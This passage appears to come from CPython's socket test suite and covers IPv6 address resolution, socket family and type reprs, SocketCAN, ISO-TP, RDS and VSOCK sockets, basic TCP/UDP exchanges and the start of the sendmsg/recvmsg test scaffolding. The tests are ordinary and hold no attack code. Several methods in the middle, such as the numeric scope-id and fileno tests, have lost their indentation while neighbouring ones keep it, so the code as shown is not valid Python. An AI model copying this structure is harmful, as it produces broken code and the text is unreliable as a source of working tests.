        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.bind((HOST, 0))
        self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
        srv.close()
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
    def test_flowinfo(self):
        """Out-of-range IPv6 flowinfo values raise OverflowError."""
        self.assertRaises(OverflowError, socket.getnameinfo,
                          (support.HOSTv6, 0, 0xffffffff), 0)
        with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
            self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
    def test_getaddrinfo_ipv6_basic(self):
        """getaddrinfo() lowercases hex digits in numeric IPv6 addresses."""
        ((*_, sockaddr),) = socket.getaddrinfo(
            'ff02::1de:c0:face:8D',  # Note capital letter `D`.
            1234, socket.AF_INET6,
            socket.SOCK_DGRAM,
            socket.IPPROTO_UDP
        )
        self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
    @unittest.skipUnless(
        hasattr(socket, 'if_nameindex'),
        'if_nameindex is not supported')
    def test_getaddrinfo_ipv6_scopeid_symbolic(self):
        """A symbolic %scope suffix is translated to the interface index."""
        # Just pick up any network interface (Linux, Mac OS X)
        (ifindex, test_interface) = socket.if_nameindex()[0]
        ((*_, sockaddr),) = socket.getaddrinfo(
            'ff02::1de:c0:face:8D%' + test_interface,
            1234, socket.AF_INET6,
            socket.SOCK_DGRAM,
            socket.IPPROTO_UDP
        )
        # Note missing interface name part in IPv6 address
        self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
    @unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
    def test_unknown_socket_family_repr(self):
        """socket.family/.type report plain ints for unrecognized values."""
        # Test that when created with a family that's not one of the known
        # AF_*/SOCK_* constants, socket.family just returns the number.
        #
        # To do this we fool socket.socket into believing it already has an
        # open fd because on this path it doesn't actually verify the family and
        # type and populates the socket object.
        #
        # On Windows this trick won't work, so the test is skipped.
        fd, path = tempfile.mkstemp()
        self.addCleanup(os.unlink, path)
        # One past the largest known member is guaranteed to be unknown.
        unknown_family = max(socket.AddressFamily.__members__.values()) + 1
        unknown_type = max(
            kind
            for name, kind in socket.SocketKind.__members__.items()
            # These two are flags OR'ed into the kind, not kinds themselves.
            if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
        ) + 1
        with socket.socket(
                family=unknown_family, type=unknown_type, proto=23,
                fileno=fd) as s:
            self.assertEqual(s.family, unknown_family)
            self.assertEqual(s.type, unknown_type)
            # some OS like macOS ignore proto
            self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
    """Smoke tests for the SocketCAN (AF_CAN) family needing no CAN device."""

    def testCrucialConstants(self):
        # Merely referencing each constant raises AttributeError if the
        # build is missing it.
        socket.AF_CAN
        socket.PF_CAN
        socket.CAN_RAW

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def testBCMConstants(self):
        # Broadcast-manager protocol constant plus its opcodes.
        socket.CAN_BCM

        # opcodes
        socket.CAN_BCM_TX_SETUP     # create (cyclic) transmission task
        socket.CAN_BCM_TX_DELETE    # remove (cyclic) transmission task
        socket.CAN_BCM_TX_READ      # read properties of (cyclic) transmission task
        socket.CAN_BCM_TX_SEND      # send one CAN frame
        socket.CAN_BCM_RX_SETUP     # create RX content filter subscription
        socket.CAN_BCM_RX_DELETE    # remove RX content filter subscription
        socket.CAN_BCM_RX_READ      # read properties of RX content filter subscription
        socket.CAN_BCM_TX_STATUS    # reply to TX_READ request
        socket.CAN_BCM_TX_EXPIRED   # notification on performed transmissions (count=0)
        socket.CAN_BCM_RX_STATUS    # reply to RX_READ request
        socket.CAN_BCM_RX_TIMEOUT   # cyclic message is absent
        socket.CAN_BCM_RX_CHANGED   # updated CAN frame (detected content change)

    def testCreateSocket(self):
        # Creating a raw CAN socket must succeed (no bind required).
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            pass

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def testCreateBCMSocket(self):
        # Creating a broadcast-manager socket must succeed.
        with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
            pass

    def testBindAny(self):
        # An empty interface name binds to all CAN interfaces.
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            s.bind(('', ))

    def testTooLongInterfaceName(self):
        # most systems limit IFNAMSIZ to 16, take 1024 to be sure
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            self.assertRaisesRegex(OSError, 'interface name too long',
                                   s.bind, ('x' * 1024,))

    @unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
                         'socket.CAN_RAW_LOOPBACK required for this test.')
    def testLoopback(self):
        # The loopback option must round-trip for both off (0) and on (1).
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            for loopback in (0, 1):
                s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
                             loopback)
                self.assertEqual(loopback,
                    s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))

    @unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
                         'socket.CAN_RAW_FILTER required for this test.')
    def testFilter(self):
        # A packed (can_id, can_mask) filter must round-trip, and the
        # option must also accept a bytearray.
        can_id, can_mask = 0x200, 0x700
        can_filter = struct.pack("=II", can_id, can_mask)
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
            self.assertEqual(can_filter,
                    s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
            s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
    """Threaded send/receive tests over a raw CAN socket pair.

    Each test* method runs in the server thread while its matching
    _test* method runs in the client thread (see ThreadedCANSocketTest).
    """

    def __init__(self, methodName='runTest'):
        ThreadedCANSocketTest.__init__(self, methodName=methodName)

    @classmethod
    def build_can_frame(cls, can_id, data):
        """Build a CAN frame."""
        can_dlc = len(data)
        # The payload field of a classic CAN frame is always 8 bytes;
        # pad shorter payloads with NULs.
        data = data.ljust(8, b'\x00')
        return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)

    @classmethod
    def dissect_can_frame(cls, frame):
        """Dissect a CAN frame into (can_id, can_dlc, payload)."""
        can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
        # Only the first can_dlc bytes of the payload are significant.
        return (can_id, can_dlc, data[:can_dlc])

    def testSendFrame(self):
        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf, cf)
        self.assertEqual(addr[0], self.interface)
        self.assertEqual(addr[1], socket.AF_CAN)

    def _testSendFrame(self):
        self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
        self.cli.send(self.cf)

    def testSendMaxFrame(self):
        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf, cf)

    def _testSendMaxFrame(self):
        # A maximal 8-byte payload.
        self.cf = self.build_can_frame(0x00, b'\x07' * 8)
        self.cli.send(self.cf)

    def testSendMultiFrames(self):
        # Frame boundaries are preserved: two sends, two receives.
        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf1, cf)
        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf2, cf)

    def _testSendMultiFrames(self):
        self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
        self.cli.send(self.cf1)
        self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
        self.cli.send(self.cf2)

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def _testBCM(self):
        # Client half of testBCM(): the broadcast manager echoes the
        # frame queued by the server half back to this socket.
        cf, addr = self.cli.recvfrom(self.bufsize)
        self.assertEqual(self.cf, cf)
        can_id, can_dlc, data = self.dissect_can_frame(cf)
        self.assertEqual(self.can_id, can_id)
        self.assertEqual(self.data, data)

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def testBCM(self):
        bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
        self.addCleanup(bcm.close)
        bcm.connect((self.interface,))
        self.can_id = 0x123
        self.data = bytes([0xc0, 0xff, 0xee])
        self.cf = self.build_can_frame(self.can_id, self.data)
        opcode = socket.CAN_BCM_TX_SEND
        flags = 0
        count = 0
        ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
        bcm_can_id = 0x0222
        nframes = 1
        # A classic CAN frame is exactly 16 bytes.  Use a real unittest
        # assertion here: a bare ``assert`` is silently stripped when
        # Python runs with -O.
        self.assertEqual(len(self.cf), 16)
        header = struct.pack(self.bcm_cmd_msg_fmt,
                             opcode,
                             flags,
                             count,
                             ival1_seconds,
                             ival1_usec,
                             ival2_seconds,
                             ival2_usec,
                             bcm_can_id,
                             nframes,
                             )
        header_plus_frame = header + self.cf
        bytes_sent = bcm.send(header_plus_frame)
        self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
    """Creation and bind tests for CAN ISO-TP (transport protocol) sockets."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Virtual CAN interface the bind test expects to exist.
        self.interface = "vcan0"

    def testCrucialConstants(self):
        # Merely referencing each constant verifies it is exported.
        socket.AF_CAN
        socket.PF_CAN
        socket.CAN_ISOTP
        socket.SOCK_DGRAM

    def testCreateSocket(self):
        # A plain raw CAN socket must still be creatable on this build.
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW):
            pass

    @unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
                         'socket.CAN_ISOTP required for this test.')
    def testCreateISOTPSocket(self):
        with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM,
                           socket.CAN_ISOTP):
            pass

    def testTooLongInterfaceName(self):
        # most systems limit IFNAMSIZ to 16, take 1024 to be sure
        with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM,
                           socket.CAN_ISOTP) as s:
            with self.assertRaisesRegex(OSError, 'interface name too long'):
                s.bind(('x' * 1024, 1, 2))

    def testBind(self):
        try:
            with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM,
                               socket.CAN_ISOTP) as s:
                addr = self.interface, 0x123, 0x456
                s.bind(addr)
                self.assertEqual(s.getsockname(), addr)
        except OSError as e:
            # Re-raise anything except "the vcan0 interface is missing",
            # which merely means the environment is not set up for CAN.
            if e.errno != errno.ENODEV:
                raise
            self.skipTest('network interface `%s` does not exist' %
                          self.interface)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
    """Smoke tests for Reliable Datagram Sockets (AF_RDS)."""

    def testCrucialConstants(self):
        # Referencing the constants raises AttributeError if absent.
        socket.AF_RDS
        socket.PF_RDS

    def testCreateSocket(self):
        with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0):
            pass

    def testSocketBufferSize(self):
        desired_size = 16384
        with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, desired_size)
            s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, desired_size)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
    """Threaded RDS tests: each test* method runs in the server thread
    while its _test* counterpart runs in the client thread."""

    def __init__(self, methodName='runTest'):
        ThreadedRDSSocketTest.__init__(self, methodName=methodName)

    def setUp(self):
        super().setUp()
        # Event available for client/server synchronization.
        self.evt = threading.Event()

    def testSendAndRecv(self):
        # Both the datagram and the sender's address must match.
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data, data)
        self.assertEqual(self.cli_addr, addr)

    def _testSendAndRecv(self):
        self.data = b'spam'
        self.cli.sendto(self.data, 0, (HOST, self.port))

    def testPeek(self):
        # MSG_PEEK returns the datagram without consuming it...
        data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
        self.assertEqual(self.data, data)
        # ...so a normal recvfrom() still sees the same datagram.
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data, data)

    def _testPeek(self):
        self.data = b'spam'
        self.cli.sendto(self.data, 0, (HOST, self.port))

    @requireAttrs(socket.socket, 'recvmsg')
    def testSendAndRecvMsg(self):
        data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
        self.assertEqual(self.data, data)

    @requireAttrs(socket.socket, 'sendmsg')
    def _testSendAndRecvMsg(self):
        self.data = b'hello ' * 10
        self.cli.sendmsg([self.data], (), 0, (HOST, self.port))

    def testSendAndRecvMulti(self):
        # Datagram boundaries are preserved: two sends, two receives.
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data1, data)
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data2, data)

    def _testSendAndRecvMulti(self):
        self.data1 = b'bacon'
        self.cli.sendto(self.data1, 0, (HOST, self.port))
        self.data2 = b'egg'
        self.cli.sendto(self.data2, 0, (HOST, self.port))

    def testSelect(self):
        # The server socket must become readable within the 3s timeout.
        r, w, x = select.select([self.serv], [], [], 3.0)
        self.assertIn(self.serv, r)
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data, data)

    def _testSelect(self):
        self.data = b'select'
        self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
          'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
    """Basic tests for VM sockets (AF_VSOCK) that need no peer VM."""

    def testCrucialConstants(self):
        # Referencing the constant raises AttributeError if missing.
        socket.AF_VSOCK

    def testVSOCKConstants(self):
        # All VM-sockets option and address constants must be exported.
        socket.SO_VM_SOCKETS_BUFFER_SIZE
        socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
        socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
        socket.VMADDR_CID_ANY
        socket.VMADDR_PORT_ANY
        socket.VMADDR_CID_HOST
        socket.VM_SOCKETS_INVALID_VERSION
        socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID

    def testCreateSocket(self):
        with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
            pass

    def testSocketBufferSize(self):
        # Doubling each VM-sockets buffer option must round-trip through
        # setsockopt()/getsockopt().
        with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
            orig_max = s.getsockopt(socket.AF_VSOCK,
                                    socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
            orig = s.getsockopt(socket.AF_VSOCK,
                                socket.SO_VM_SOCKETS_BUFFER_SIZE)
            orig_min = s.getsockopt(socket.AF_VSOCK,
                                    socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)

            s.setsockopt(socket.AF_VSOCK,
                         socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
            s.setsockopt(socket.AF_VSOCK,
                         socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
            s.setsockopt(socket.AF_VSOCK,
                         socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)

            self.assertEqual(orig_max * 2,
                             s.getsockopt(socket.AF_VSOCK,
                             socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
            self.assertEqual(orig * 2,
                             s.getsockopt(socket.AF_VSOCK,
                             socket.SO_VM_SOCKETS_BUFFER_SIZE))
            self.assertEqual(orig_min * 2,
                             s.getsockopt(socket.AF_VSOCK,
                             socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
    """Core TCP tests over a connected socket pair.

    test* methods run in the server thread against cli_conn (the
    connection *from* the client); _test* methods run in the client
    thread against serv_conn (the connection *to* the server).
    """

    def __init__(self, methodName='runTest'):
        SocketConnectedTest.__init__(self, methodName=methodName)

    def testRecv(self):
        # Testing large receive over TCP
        msg = self.cli_conn.recv(1024)
        self.assertEqual(msg, MSG)

    def _testRecv(self):
        self.serv_conn.send(MSG)

    def testOverFlowRecv(self):
        # Testing receive in chunks over TCP
        seg1 = self.cli_conn.recv(len(MSG) - 3)
        seg2 = self.cli_conn.recv(1024)
        msg = seg1 + seg2
        self.assertEqual(msg, MSG)

    def _testOverFlowRecv(self):
        self.serv_conn.send(MSG)

    def testRecvFrom(self):
        # Testing large recvfrom() over TCP
        msg, addr = self.cli_conn.recvfrom(1024)
        self.assertEqual(msg, MSG)

    def _testRecvFrom(self):
        self.serv_conn.send(MSG)

    def testOverFlowRecvFrom(self):
        # Testing recvfrom() in chunks over TCP
        seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
        seg2, addr = self.cli_conn.recvfrom(1024)
        msg = seg1 + seg2
        self.assertEqual(msg, MSG)

    def _testOverFlowRecvFrom(self):
        self.serv_conn.send(MSG)

    def testSendAll(self):
        # Testing sendall() with a 2048 byte string over TCP
        msg = b''
        while 1:
            # Read until the peer finishes; an empty read means EOF.
            read = self.cli_conn.recv(1024)
            if not read:
                break
            msg += read
        self.assertEqual(msg, b'f' * 2048)

    def _testSendAll(self):
        big_chunk = b'f' * 2048
        self.serv_conn.sendall(big_chunk)

    def testFromFd(self):
        # Testing fromfd()
        fd = self.cli_conn.fileno()
        # fromfd() duplicates the descriptor, so both sockets stay valid.
        sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
        self.addCleanup(sock.close)
        self.assertIsInstance(sock, socket.socket)
        msg = sock.recv(1024)
        self.assertEqual(msg, MSG)

    def _testFromFd(self):
        self.serv_conn.send(MSG)

    def testDup(self):
        # Testing dup()
        sock = self.cli_conn.dup()
        self.addCleanup(sock.close)
        msg = sock.recv(1024)
        self.assertEqual(msg, MSG)

    def _testDup(self):
        self.serv_conn.send(MSG)

    def testShutdown(self):
        # Testing shutdown()
        msg = self.cli_conn.recv(1024)
        self.assertEqual(msg, MSG)
        # wait for _testShutdown to finish: on OS X, when the server
        # closes the connection the client also becomes disconnected,
        # and the client's shutdown call will fail. (Issue #4397.)
        self.done.wait()

    def _testShutdown(self):
        self.serv_conn.send(MSG)
        self.serv_conn.shutdown(2)

    # The overflow variant reuses testShutdown() as its server half;
    # only the client half (_testShutdown_overflow below) differs.
    testShutdown_overflow = support.cpython_only(testShutdown)

    @support.cpython_only
    def _testShutdown_overflow(self):
        import _testcapi
        self.serv_conn.send(MSG)
        # Issue 15989
        self.assertRaises(OverflowError, self.serv_conn.shutdown,
                          _testcapi.INT_MAX + 1)
        self.assertRaises(OverflowError, self.serv_conn.shutdown,
                          2 + (_testcapi.UINT_MAX + 1))
        self.serv_conn.shutdown(2)

    def testDetach(self):
        # Testing detach()
        fileno = self.cli_conn.fileno()
        f = self.cli_conn.detach()
        self.assertEqual(f, fileno)
        # cli_conn cannot be used anymore...
        self.assertTrue(self.cli_conn._closed)
        self.assertRaises(OSError, self.cli_conn.recv, 1024)
        self.cli_conn.close()
        # ...but we can create another socket using the (still open)
        # file descriptor
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
        self.addCleanup(sock.close)
        msg = sock.recv(1024)
        self.assertEqual(msg, MSG)

    def _testDetach(self):
        self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
    """Threaded UDP tests: test* runs server-side, _test* client-side."""

    def __init__(self, methodName='runTest'):
        ThreadedUDPSocketTest.__init__(self, methodName=methodName)

    def testSendtoAndRecv(self):
        # Testing sendto() and Recv() over UDP
        received = self.serv.recv(len(MSG))
        self.assertEqual(MSG, received)

    def _testSendtoAndRecv(self):
        self.cli.sendto(MSG, 0, (HOST, self.port))

    def testRecvFrom(self):
        # Testing recvfrom() over UDP
        received, sender = self.serv.recvfrom(len(MSG))
        self.assertEqual(MSG, received)

    def _testRecvFrom(self):
        self.cli.sendto(MSG, 0, (HOST, self.port))

    def testRecvFromNegative(self):
        # Negative lengths passed to recvfrom should give ValueError.
        self.assertRaises(ValueError, self.serv.recvfrom, -1)

    def _testRecvFromNegative(self):
        self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
    """Base class for sendmsg()/recvmsg() tests.

    Subclasses supply cli_sock/serv_sock (directly or via properties)
    and may override the hooks below to adapt per socket type.
    """

    # Time in seconds to wait before considering a test failed, or
    # None for no timeout.  Not all tests actually set a timeout.
    fail_timeout = 3.0

    def setUp(self):
        # Event available for client/server synchronization.
        self.misc_event = threading.Event()
        super().setUp()

    def sendToServer(self, msg):
        # Send msg to the server.
        return self.cli_sock.send(msg)

    # Tuple of alternative default arguments for sendmsg() when called
    # via sendmsgToServer() (e.g. to include a destination address).
    sendmsg_to_server_defaults = ()

    def sendmsgToServer(self, *args):
        # Call sendmsg() on self.cli_sock with the given arguments,
        # filling in any arguments which are not supplied with the
        # corresponding items of self.sendmsg_to_server_defaults, if
        # any.
        return self.cli_sock.sendmsg(
            *(args + self.sendmsg_to_server_defaults[len(args):]))

    def doRecvmsg(self, sock, bufsize, *args):
        # Call recvmsg() on sock with given arguments and return its
        # result. Should be used for tests which can use either
        # recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
        # this method with one which emulates it using recvmsg_into(),
        # thus allowing the same test to be used for both methods.
        result = sock.recvmsg(bufsize, *args)
        self.registerRecvmsgResult(result)
        return result

    def registerRecvmsgResult(self, result):
        # Called by doRecvmsg() with the return value of recvmsg() or
        # recvmsg_into(). Can be overridden to arrange cleanup based
        # on the returned ancillary data, for instance.
        pass

    def checkRecvmsgAddress(self, addr1, addr2):
        # Called to compare the received address with the address of
        # the peer.
        self.assertEqual(addr1, addr2)

    # Flags that are normally unset in msg_flags
    # (computed at class-definition time; getattr() tolerates platforms
    # that lack a given MSG_* constant).
    msg_flags_common_unset = 0
    for name in ("MSG_CTRUNC", "MSG_OOB"):
        msg_flags_common_unset |= getattr(socket, name, 0)

    # Flags that are normally set
    msg_flags_common_set = 0

    # Flags set when a complete record has been received (e.g. MSG_EOR
    # for SCTP)
    msg_flags_eor_indicator = 0

    # Flags set when a complete record has not been received
    # (e.g. MSG_TRUNC for datagram sockets)
    msg_flags_non_eor_indicator = 0

    def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
        # Method to check the value of msg_flags returned by recvmsg[_into]().
        #
        # Checks that all bits in msg_flags_common_set attribute are
        # set in "flags" and all bits in msg_flags_common_unset are
        # unset.
        #
        # The "eor" argument specifies whether the flags should
        # indicate that a full record (or datagram) has been received.
        # If "eor" is None, no checks are done; otherwise, checks
        # that:
        #
        #  * if "eor" is true, all bits in msg_flags_eor_indicator are
        #    set and all bits in msg_flags_non_eor_indicator are unset
        #
        #  * if "eor" is false, all bits in msg_flags_non_eor_indicator
        #    are set and all bits in msg_flags_eor_indicator are unset
        #
        # If "checkset" and/or "checkunset" are supplied, they require
        # the given bits to be set or unset respectively, overriding
        # what the attributes require for those bits.
        #
        # If any bits are set in "ignore", they will not be checked,
        # regardless of the other inputs.
        #
        # Will raise Exception if the inputs require a bit to be both
        # set and unset, and it is not ignored.
        defaultset = self.msg_flags_common_set
